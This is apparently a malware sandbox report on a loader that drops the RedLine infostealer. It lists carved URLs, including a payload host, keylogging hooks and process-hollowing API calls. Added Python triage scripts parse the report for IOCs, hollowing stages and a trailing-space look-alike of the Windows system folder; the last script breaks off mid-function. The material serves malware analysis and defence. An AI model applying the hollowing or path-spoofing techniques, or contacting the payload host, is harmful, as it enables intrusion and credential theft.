Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0C
Source: powershell.exe, 00000012.00000002.1630809975.0000000004345000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007AF000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r11.i.lencr.org/0
Source: Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r11.o.le
Source: Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r11.o.lencr.org0#
Source: powershell.exe, 00000012.00000002.1630809975.0000000004345000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000012.00000002.1630809975.0000000004345000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000012.00000002.1630809975.0000000004345000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: alg.exe, 00000011.00000003.2653651817.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2667859499.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/
Source: alg.exe, 00000011.00000003.2668324932.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2653910451.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/8
Source: C6dAUcOA6M.exe, C6dAUcOA6M.exe, 00000000.00000003.1300720331.0000000002B55000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1439616060.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.00000000209D0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1540095281.0000000021EA2000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1458982491.0000000002B53000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020AA2000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1439616060.0000000021B3B000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1576898183.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, aymtmquJ.pif, 0000000B.00000000.1440342602.0000000000416000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.pmail.com
Source: alg.exe, 00000011.00000003.1966940811.0000000001590000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007AF000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007AF000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.dyn.com/
Source: Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org
Source: Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/
Source: Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/t
Source: alg.exe, 00000011.00000003.2537534713.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: alg.exe, 00000011.00000003.2088475642.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxFailed
Source: alg.exe, 00000011.00000003.2090116293.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2090557256.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
Source: powershell.exe, 00000012.00000002.1734942453.000000000525A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000012.00000002.1734942453.000000000525A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000012.00000002.1734942453.000000000525A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: alg.exe, 00000011.00000003.2537614996.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: powershell.exe, 00000012.00000002.1630809975.0000000004345000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: C6dAUcOA6M.exe, 00000000.00000002.1445092943.00000000006B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/R
Source: C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020ADD000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/yak2/233_Juqmtm
Source: C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020AF3000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1445092943.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020AC8000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1445092943.000000000063E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/yak2/233_Juqmtmyadyy
Source: C6dAUcOA6M.exe, 00000000.00000002.1445092943.0000000000694000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/yak2/233_JuqmtmyadyyH
Source: C6dAUcOA6M.exe, 00000000.00000002.1445092943.000000000063E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/yak2/233_Juqmtmyadyyc9
Source: C6dAUcOA6M.exe, 00000000.00000002.1445092943.00000000006BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com:443/yak2/233_Juqmtmyadyy2
Source: alg.exe, 00000011.00000003.2537698906.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: alg.exe, 00000011.00000003.2537698906.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1
Source: alg.exe, 00000011.00000003.2537281630.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: powershell.exe, 00000012.00000002.1734942453.000000000525A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: alg.exe, 00000011.00000003.2718995164.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.autoitscript.com/site/autoit/8
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.10:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49759 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49826 version: TLS 1.2
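The gxe0.com strings above are carved from process memory, so the same URL surfaces several times with a truncated or over-run tail (/yak2/233_Juqmtm, ...yadyyH, ...yadyyc9, :443/...yadyy2), while the form found in four separate dumps is the most likely real string. The following is an added Python example, not part of the Joe Sandbox output: it parses these report lines, drops hosts from a benign allow-list (contoso.com, sectigo.com, the Mozilla and NuGet hosts; this list is an assumption to tune locally) and ranks the path variants per host by how many dumps contain them.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample: the URL lines from this report section, with the long
# memory-dump identifiers shortened to "...sdmp" (only their count is used).
REPORT_LINES = [
    "Source: powershell.exe, ...sdmp String found in binary or memory: https://contoso.com/License",
    "Source: alg.exe, ...sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=",
    "Source: C6dAUcOA6M.exe, ...sdmp String found in binary or memory: https://gxe0.com/R",
    "Source: C6dAUcOA6M.exe, ...sdmp String found in binary or memory: https://gxe0.com/yak2/233_Juqmtm",
    "Source: C6dAUcOA6M.exe, ...sdmp, C6dAUcOA6M.exe, ...sdmp, C6dAUcOA6M.exe, ...sdmp, C6dAUcOA6M.exe, ...sdmp "
    "String found in binary or memory: https://gxe0.com/yak2/233_Juqmtmyadyy",
    "Source: C6dAUcOA6M.exe, ...sdmp String found in binary or memory: https://gxe0.com/yak2/233_JuqmtmyadyyH",
    "Source: C6dAUcOA6M.exe, ...sdmp String found in binary or memory: https://gxe0.com/yak2/233_Juqmtmyadyyc9",
    "Source: C6dAUcOA6M.exe, ...sdmp String found in binary or memory: https://gxe0.com:443/yak2/233_Juqmtmyadyy2",
    "Source: C6dAUcOA6M.exe, ...sdmp, C6dAUcOA6M.exe, ...sdmp String found in binary or memory: https://sectigo.com/CPS0",
]

# Hosts that appear in most sandbox runs because they belong to PowerShell help
# text, Firefox, NuGet or a CA rather than to the sample.
# Assumption: an allow-list you maintain per environment, not a Joe Sandbox list.
BENIGN_HOSTS = {"contoso.com", "nuget.org", "github.com", "sectigo.com"}
BENIGN_SUFFIXES = (".mozilla.org", ".mozilla.com", ".autoitscript.com")

LINE_RE = re.compile(r"^Source: (?P<sources>.+?) String found in binary or memory: (?P<url>\S+)$")


def parse_url_hits(lines):
    """Yield (host, path, dump_count) for each carved-URL line."""
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        dumps = max(1, m.group("sources").count(".sdmp"))
        u = urlsplit(m.group("url"))
        if not u.hostname:
            continue
        yield u.hostname, u.path or "/", dumps


def is_benign(host):
    return host in BENIGN_HOSTS or host.endswith(BENIGN_SUFFIXES)


def rank_candidates(lines):
    """Group carved URLs by host, drop allow-listed hosts and, per host, pick the
    path variant supported by the most memory dumps. Variants that differ only
    by trailing bytes (...yadyyH, ...yadyyc9) are carving artefacts: each is seen
    in a single dump and is listed as a variant rather than as its own IOC."""
    by_host = defaultdict(lambda: defaultdict(int))
    for host, path, dumps in parse_url_hits(lines):
        if not is_benign(host):
            by_host[host][path] += dumps
    ranked = {}
    for host, paths in by_host.items():
        def score(p):
            # most dumps first, then the variant that prefixes the most others,
            # then the shortest string
            covers = sum(1 for q in paths if q != p and q.startswith(p))
            return (paths[p], covers, -len(p))
        best = max(paths, key=score)
        ranked[host] = {"path": best, "dumps": paths[best],
                        "variants": sorted(p for p in paths if p != best)}
    return ranked


if __name__ == "__main__":
    for host, info in rank_candidates(REPORT_LINES).items():
        print(f"{host}{info['path']}  (seen in {info['dumps']} dumps; "
              f"{len(info['variants'])} carved variants)")
```

Dump count is a confidence signal, not proof: a string that sits in one region only may still be the real one if the loader decrypts its config late, so keep the variants in the IOC record rather than discarding them.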

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, cPKWk.cs .Net Code: I3Mi2zn6x
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: 13.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 40.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 32.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 13.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 32.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: Trading_AIBot.exe.11.dr, cfRDgxIJtEfCD.cs Long String: Length: 17605
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe File dump: apihost.exe.14.dr 665670656
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D08670 NtUnmapViewOfSection, 0_2_02D08670
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D08400 NtReadVirtualMemory, 0_2_02D08400
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D07A2C NtAllocateVirtualMemory, 0_2_02D07A2C
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 0_2_02D0DC8C
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile, 0_2_02D0DC04
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D08D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 0_2_02D08D70
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, 0_2_02D0DD70
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D07D78 NtWriteVirtualMemory, 0_2_02D07D78
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D07A2A NtAllocateVirtualMemory, 0_2_02D07A2A
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile, 0_2_02D0DBB0
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D08D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 0_2_02D08D6E
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF64CA NtQueryInformationToken, 7_2_00EF64CA
Source: C:\Users\Public\alpha.pif Code function: 7_2_00F07460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, 7_2_00F07460
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF4823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, 7_2_00EF4823
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF643A NtOpenThreadToken,NtOpenProcessToken,NtClose, 7_2_00EF643A
Source: C:\Users\Public\alpha.pif Code function: 7_2_00F0C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 7_2_00F0C1FA
Source: C:\Users\Public\alpha.pif Code function: 7_2_00F0A135 NtSetInformationFile, 7_2_00F0A135
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF6500 NtQueryInformationToken,NtQueryInformationToken, 7_2_00EF6500
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE4E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp, 7_2_00EE4E3B
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF4759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError, 7_2_00EF4759
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF64CA NtQueryInformationToken, 15_2_00EF64CA
Source: C:\Users\Public\alpha.pif Code function: 15_2_00F07460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, 15_2_00F07460
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF4823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, 15_2_00EF4823
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF643A NtOpenThreadToken,NtOpenProcessToken,NtClose, 15_2_00EF643A
Source: C:\Users\Public\alpha.pif Code function: 15_2_00F0C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 15_2_00F0C1FA
Source: C:\Users\Public\alpha.pif Code function: 15_2_00F0A135 NtSetInformationFile, 15_2_00F0A135
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF6500 NtQueryInformationToken,NtQueryInformationToken, 15_2_00EF6500
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EE4E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp, 15_2_00EE4E3B
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF4759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError, 15_2_00EF4759
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE4C10: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z, 7_2_00EE4C10
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0F7C8 InetIsOffline,CoInitialize,CoUninitialize,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess, 0_2_02D0F7C8
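Taken together, the C6dAUcOA6M.exe functions above resolve the complete process-hollowing tool-set: NtUnmapViewOfSection, NtAllocateVirtualMemory, NtWriteVirtualMemory, (Wow64)SetThreadContext with NtResumeThread, and CreateProcessAsUserW followed by ResumeThread in the function at 0_2_02D0F7C8. The Wow64 variants are what a 32-bit loader on a 64-bit host uses. alpha.pif also calls Nt* functions, but none from this set. The following is an added Python example, not part of the report: it scores each binary's attributed call set against those stages so the loader stands out from the helper binaries. It is a triage aid over the static evidence the sandbox printed; a loader that resolves these calls by hash at run time would not show up here. The stage-to-API table is an assumption of the example.

```python
import re
from collections import defaultdict

# Constructed sample: "Code function" lines from this report (the loader, the
# alpha.pif helper) plus one line without an API list, which must be ignored.
SAMPLE_LINES = [
    "Source: C:\\Users\\user\\Desktop\\C6dAUcOA6M.exe Code function: 0_2_02D08670 NtUnmapViewOfSection, 0_2_02D08670",
    "Source: C:\\Users\\user\\Desktop\\C6dAUcOA6M.exe Code function: 0_2_02D07A2C NtAllocateVirtualMemory, 0_2_02D07A2C",
    "Source: C:\\Users\\user\\Desktop\\C6dAUcOA6M.exe Code function: 0_2_02D08D70 GetThreadContext,Wow64GetThreadContext,"
    "SetThreadContext,Wow64SetThreadContext,NtResumeThread, 0_2_02D08D70",
    "Source: C:\\Users\\user\\Desktop\\C6dAUcOA6M.exe Code function: 0_2_02D07D78 NtWriteVirtualMemory, 0_2_02D07D78",
    "Source: C:\\Users\\user\\Desktop\\C6dAUcOA6M.exe Code function: 0_2_02D0F7C8 InetIsOffline,CoInitialize,CoUninitialize,"
    "CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess, 0_2_02D0F7C8",
    "Source: C:\\Users\\Public\\alpha.pif Code function: 7_2_00EF643A NtOpenThreadToken,NtOpenProcessToken,NtClose, 7_2_00EF643A",
    "Source: C:\\Users\\Public\\alpha.pif Code function: 7_2_00EE4C10: memset,GetFileSecurityW,GetSecurityDescriptorOwner,"
    "??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle, 7_2_00EE4C10",
    "Source: C:\\Users\\user\\Desktop\\C6dAUcOA6M.exe Code function: 0_2_02CF20C4 0_2_02CF20C4",
]

# One hollowing stage -> the calls that implement it. The documented Win32
# forms are listed next to the Nt* forms so the same check covers both styles.
STAGES = {
    "unmap":   {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"},
    "alloc":   {"NtAllocateVirtualMemory", "VirtualAllocEx"},
    "write":   {"NtWriteVirtualMemory", "WriteProcessMemory"},
    "context": {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"},
    "resume":  {"NtResumeThread", "ResumeThread"},
    "spawn":   {"CreateProcessAsUserW", "CreateProcessW", "CreateProcessA", "CreateProcessInternalW"},
}
CORE = ("unmap", "alloc", "write", "context", "resume")

# "<fn> <api,api,...,> <fn>"; lines with no API list have only two tokens and do not match.
CODE_FN_RE = re.compile(r"^Source: (?P<bin>.+?) Code function: (?P<fn>\S+?):? (?P<apis>\S+) \S+$")


def apis_per_binary(lines):
    """Collect the set of calls the sandbox attributed to each binary."""
    found = defaultdict(set)
    for line in lines:
        m = CODE_FN_RE.match(line)
        if m:
            found[m.group("bin")].update(a for a in m.group("apis").split(",") if a)
    return found


def hollowing_coverage(lines):
    """Per binary: which stages its call set covers, a 0-6 score, and whether
    all five core stages (unmap, alloc, write, context, resume) are present."""
    report = {}
    for binary, apis in apis_per_binary(lines).items():
        stages = {s: sorted(apis & names) for s, names in STAGES.items() if apis & names}
        report[binary] = {
            "stages": stages,
            "score": len(stages),
            "complete": all(s in stages for s in CORE),
        }
    return report


if __name__ == "__main__":
    for binary, r in hollowing_coverage(SAMPLE_LINES).items():
        print(f"{r['score']}/6 {'COMPLETE ' if r['complete'] else ''}{binary}: {r['stages']}")
```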
Source: C:\Users\Public\alpha.pif File created: C:\Windows Jump to behavior
Source: C:\Users\Public\alpha.pif File created: C:\Windows \SysWOW64 Jump to behavior
Source: C:\Windows\System32\alg.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\605af54964cdb3b4.bin
Source: C:\Users\Public\alpha.pif File deleted: C:\Windows \SysWOW64
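alpha.pif creates and later deletes C:\Windows \SysWOW64, a path whose Windows component carries a trailing space. That is a different NTFS directory from C:\Windows\SysWOW64: the Win32 path layer strips trailing spaces and dots from ordinary paths, so a name like this can only be created or opened through the \\?\ prefix or the native NT path API (compare the RtlDosPathNameToNtPathName_U, NtCreateFile pair in the loader's functions above), while anything that trusts a path by its prefix sees the real system directory. The following is an added Python example, not part of the report: it canonicalises each path component the way Win32 would, flags the components that change, and reports which protected root the canonical path lands under. The protected-root list is an assumption to extend for your estate.

```python
import re

# Roots whose names a look-alike directory would borrow. Assumption: extend locally.
PROTECTED_ROOTS = ("c:\\windows", "c:\\program files", "c:\\program files (x86)")

# Constructed sample: file events from this report. The "Jump to behavior" link
# text is left in place because the parser has to cope with it.
SAMPLE_EVENTS = [
    "Source: C:\\Users\\Public\\alpha.pif File created: C:\\Windows \\SysWOW64 Jump to behavior",
    "Source: C:\\Windows\\System32\\alg.exe File created: "
    "C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\605af54964cdb3b4.bin",
    "Source: C:\\Users\\Public\\alpha.pif File deleted: C:\\Windows \\SysWOW64",
    "Source: C:\\Users\\user\\Desktop\\C6dAUcOA6M.exe File created: C:\\Users\\Public\\Libraries\\PNO Jump to behavior",
]

EVENT_RE = re.compile(
    r"^Source: (?P<proc>.+?) File (?P<action>created|deleted|written): (?P<target>.+?)(?: Jump to .+)?$")


def split_components(path):
    """Split a Win32 or \\\\?\\-prefixed path into raw components, keeping any
    trailing spaces or dots exactly as written."""
    p = path[4:] if path.startswith("\\\\?\\") else path
    return p.replace("/", "\\").split("\\")


def classify_path(path):
    """Flag components that the Win32 path layer would silently trim (trailing
    spaces and dots) and report which protected root the trimmed path lands under."""
    comps = split_components(path)
    trimmed = [c.rstrip(" .") for c in comps]
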